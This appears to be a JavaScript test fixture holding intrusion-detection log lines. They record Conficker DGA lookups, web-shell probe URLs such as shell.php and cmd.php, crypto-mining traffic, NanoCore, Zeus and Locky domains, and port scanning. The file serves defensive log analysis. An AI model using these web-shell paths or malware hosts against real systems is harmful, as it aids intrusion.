    '"2021-01-11 03:51:25.209524" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:25.209525" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:23.257579" r2d2 178.17.174.14 35572 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; BTRS129168; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:23.257535" r2d2 178.17.174.14 35572 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; BTRS129168; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:31.112509" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS uofal.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.112502" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS buysluftq.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.112512" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS uofal.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.112735" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS jeeucpfxckn.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.112741" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS jeeucpfxckn.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.112746" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS jltkojnpfkq.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.113007" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS ybclaiyb.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.112996" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS ybclaiyb.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.113014" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS gaetd.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.113021" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS gaetd.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.113264" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS sskuvwsp.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.113275" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS sskuvwsp.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.113279" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS kytelggvco.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.113286" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS kytelggvco.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.113510" r2d2 2.200.109.50 60449 8.8.8.8 53 UDP DNS uofal.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.113453" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS cdoktffgmrj.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.113461" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS gedfqa.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.113644" r2d2 2.200.109.50 62225 8.8.8.8 53 UDP DNS jeeucpfxckn.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.113963" r2d2 2.200.109.50 62536 8.8.8.8 53 UDP DNS ybclaiyb.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.114725" r2d2 2.200.109.50 62133 8.8.8.8 53 UDP DNS gedfqa.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:31.135212" r2d2 8.8.8.8 53 2.200.109.50 60449 UDP DNS (uofal).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:51:31.135273" r2d2 8.8.8.8 53 2.200.109.50 60449 UDP DNS (uofal).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:51:31.353217" r2d2 8.8.8.8 53 2.200.109.50 60583 UDP DNS (sskuvwsp).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:51:31.353208" r2d2 8.8.8.8 53 2.200.109.50 60583 UDP DNS (sskuvwsp).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:51:34.824320" r2d2 10.1.19.42 59631 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:38.497344" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS gsouzdihkv.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.497346" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS trygekw.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.497530" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS ndsuf.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.497340" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS trygekw.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.497531" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS ndsuf.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.497528" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS ouybxcmj.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.497991" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS tknklstb.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.497712" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS mutsz.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.497861" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS jhzgz.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.497980" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS tknklstb.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.498433" r2d2 2.200.109.50 60192 8.8.8.8 53 UDP DNS trygekw.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.498024" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS fwkifqwk.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.498229" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS hqaykqrfvg.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.498237" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS hqaykqrfvg.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.498290" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS apqlicefr.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.498300" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS apqlicefr.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.498556" r2d2 2.200.109.50 62579 8.8.8.8 53 UDP DNS ouybxcmj.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.498564" r2d2 2.200.109.50 61571 8.8.8.8 53 UDP DNS ndsuf.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.499147" r2d2 2.200.109.50 62339 8.8.8.8 53 UDP DNS apqlicefr.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.498731" r2d2 2.200.109.50 60540 8.8.8.8 53 UDP DNS jhzgz.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.498895" r2d2 2.200.109.50 62086 8.8.8.8 53 UDP DNS fwkifqwk.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:38.737431" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86/images/stories)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:38.737428" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86/images/stories)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:38.737425" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86/images/stories)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:39.179823" r2d2 10.43.192.103 59195 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:51:45.775992" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS piacjayhur.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.775936" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS izzisoqg.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.776186" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS zeprhmbzk.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.775704" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS ymizt.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.775925" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS izzisoqg.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.776115" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS vlbfd.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.776304" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS ztqoafbc.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.776001" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS piacjayhur.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.776447" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS oqjgdk.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.776242" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS ztqoafbc.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.776195" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS zeprhmbzk.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.776768" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS oxkeb.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.776438" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS vmgummm.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.776368" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS vmgummm.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.777381" r2d2 2.200.109.50 60676 8.8.8.8 53 UDP DNS vmgummm.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.776713" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS oxkeb.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.777588" r2d2 2.200.109.50 61737 8.8.8.8 53 UDP DNS oxkeb.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.777315" r2d2 2.200.109.50 61772 8.8.8.8 53 UDP DNS zeprhmbzk.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.776566" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS npantvy.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.776771" r2d2 2.200.109.50 61473 8.8.8.8 53 UDP DNS izzisoqg.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.777449" r2d2 2.200.109.50 62290 8.8.8.8 53 UDP DNS oqjgdk.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.782514" r2d2 2.200.109.50 61437 8.8.8.8 53 UDP DNS npantvy.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:45.796304" r2d2 8.8.8.8 53 2.200.109.50 61473 UDP DNS (izzisoqg).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:51:45.796691" r2d2 8.8.8.8 53 2.200.109.50 61473 UDP DNS (izzisoqg).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:51:51.223935" r2d2 10.43.192.103 59197 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:51:51.678782" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:51.678791" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:51.678789" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:51.678803" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:53.060130" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS gtvzphqj.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.060079" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS bflmutsy.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.060335" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS ljuqzpat.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.060448" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS fenbbbnrrx.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.060676" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS ykhcoksivge.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.060683" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS ykhcoksivge.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.060922" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS fvtlbvok.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.060914" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS trjsszdtlrk.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.060087" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS bflmutsy.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.061033" r2d2 2.200.109.50 60697 8.8.8.8 53 UDP DNS bflmutsy.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.062057" r2d2 2.200.109.50 60791 8.8.8.8 53 UDP DNS oijol.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.060328" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS ljuqzpat.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.061174" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS oijol.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.060456" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS fenbbbnrrx.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.060687" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS dvmdjygjsfm.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.060921" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS fvtlbvok.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.061082" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS meypmo.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.061250" r2d2 2.200.109.50 61070 8.8.8.8 53 UDP DNS fenbbbnrrx.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.061495" r2d2 2.200.109.50 62173 8.8.8.8 53 UDP DNS dvmdjygjsfm.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.061662" r2d2 2.200.109.50 62376 8.8.8.8 53 UDP DNS fvtlbvok.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:53.062045" r2d2 2.200.109.50 60985 8.8.8.8 53 UDP DNS meypmo.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:56.761267" r2d2 2.200.110.233 63737 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 03:51:57.263517" r2d2 10.43.192.103 59198 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:51:54.910526" r2d2 178.17.174.14 37512 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB7.5; InfoPath.3; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts; BRI/1; .NET4.0C; BRI/2\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:59.621314" r2d2 2.200.110.232 64827 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:51:59.623179" r2d2 2.200.107.146 59517 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:52:02.404212" r2d2 2.200.110.233 64945 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:51:54.910586" r2d2 178.17.174.14 37512 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB7.5; InfoPath.3; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts; BRI/1; .NET4.0C; BRI/2\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:52:07.075561" r2d2 2.200.107.168 53 2.200.110.232 64553 UDP DNS (leicon).it "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:52:07.075568" r2d2 2.200.107.168 53 2.200.110.232 64553 UDP DNS (leicon).it "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:52:09.342649" r2d2 10.43.192.103 59200 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:52:16.328536" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:16.328540" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:16.328533" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:16.328539" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:16.328538" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:16.328542" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:16.476049" r2d2 2.200.105.226 59120 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:52:16.476120" r2d2 2.200.105.226 59120 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:52:17.421527" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:17.421530" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:17.421523" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:23.685560" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:23.685568" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:23.685567" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:23.685565" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:23.685571" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:23.685569" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:27.433396" r2d2 10.43.192.103 59203 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:52:39.500974" r2d2 10.43.192.103 59205 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:52:43.382178" r2d2 2.200.110.232 64696 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:52:43.383727" r2d2 2.200.107.146 10724 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:52:44.843965" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:44.843974" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:44.843971" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:44.843893" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:44.843975" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:44.843972" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:52:45.531960" r2d2 10.43.192.103 59206 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:52:57.593896" r2d2 10.43.192.103 59208 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:53:08.286480" r2d2 2.200.110.233 63375 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:53:08.288143" r2d2 2.200.107.146 11467 97.74.105.26 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:53:08.479301" r2d2 2.200.110.233 65177 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 03:53:10.736325" r2d2 2.200.110.233 64927 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:53:12.404711" r2d2 2.200.110.232 64718 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:53:12.405992" r2d2 2.200.107.146 42547 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:53:12.439884" r2d2 2.200.110.233 64413 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:53:15.715290" r2d2 10.43.192.103 59211 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:53:15.971123" r2d2 2.200.110.232 65395 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 03:53:15.972753" r2d2 2.200.107.146 22542 205.251.193.223 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 03:53:27.787669" r2d2 10.43.192.103 59213 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:53:33.816602" r2d2 10.43.192.103 59214 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:53:36.161474" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/mysql.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:53:36.161473" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/mysql.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:53:36.161479" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/mysql.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:53:36.161468" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/mysql.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:53:36.161478" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/mysql.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:53:36.161476" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/mysql.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:53:32.000315" r2d2 2.200.108.59 12582,12583,12585,12589,12598,12600,12602,12603,12605,12609,33626,33722,34122,34892,34950,35258,35346,35812,36078,36356,36414,36428,36900,36988,38124,38606,39312,39514,39862,39934,40096,41050,41534,41774,41908,42646,42830,42832,42835,42838,42840,42841,43002,43732,43740,44100,44342,44544,44692,44990,45310,45374,46634,47062,47180,47738,47832,48901,48904,48906,48909,49150,50582,50990,51432,51504,51826,51888,52282,52496,52694,52952,53272,53464,53582,54124,55522,55754,55862,55930,56080,56754,56758,57190,57422,58290,58410,58500,58826,58920,59010,59100,59314,59568,59826,60278,60942 77.53.81.105 21,5554,5595,5657,6688,7249,7260,7771,10048,10163,11417,11431,13353,13477,13923,14913,15606,17717,18135,18501,18544,18593,18827,21548,21652,22396,22552,23010,24644,26219,26910,28568,29257,29289,29645,29965,30565,31684,31868,34826,36460,36797,38322,40594,41194,42232,42363,42607,42837,42953,43051,44070,45183,46293,46700,46860,46909,50177,50998,51588,52110,54552,54738,55487,55515,55722,55842,56088,58069,58139,60155,61472,61505,62292,62313,62522,63129,63367 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:53:32.000735" r2d2 2.200.108.59 12581,12588,12589,12592,12594,12595,12600,12601,12603,12605,12606,12608,12611,12612,12613,33060,34400,34892,34950,35172,35258,35638,35658,36078,36200,36414,37332,38000,38054,38330,38412,38606,39396,39514,39862,39934,40398,40668,41438,41534,41724,41938,42218,42526,42835,42836,42837,42838,43158,44686,44998,45374,45642,45806,47062,47180,47302,48146,48903,48905,48907,48908,49432,49530,50990,51888,51986,52282,52496,53130,53358,53604,54594,55522,55552,55624,56080,56228,56488,56648,57190,57782,58074,58386,58500,58920,59010,59174,59314,60278,60388,60920 77.53.81.105 21,5657,6081,7260,7771,10163,10941,11417,11460,12540,13868,14913,17363,17810,17819,18135,18593,18827,19408,21526,24189,25558,25894,26009,26910,27506,27666,29965,30565,32502,32696,34541,36615,37289,37523,38478,39238,39392,39424,40349,41137,41194,42065,42363,43203,44070,44692,44906,46293,46909,47037,48091,49610,49794,50359,50669,50775,52110,52498,54738,55487,55515,55842,56088,57948,60155,62522,63588,64441,64557 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:53:40.185687" r2d2 2.200.107.168 53 2.200.110.232 49435 UDP DNS (leicon).it "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:53:40.185677" r2d2 2.200.107.168 53 2.200.110.232 49435 UDP DNS (leicon).it "parked site (suspicious)" (heuristic)\n' +
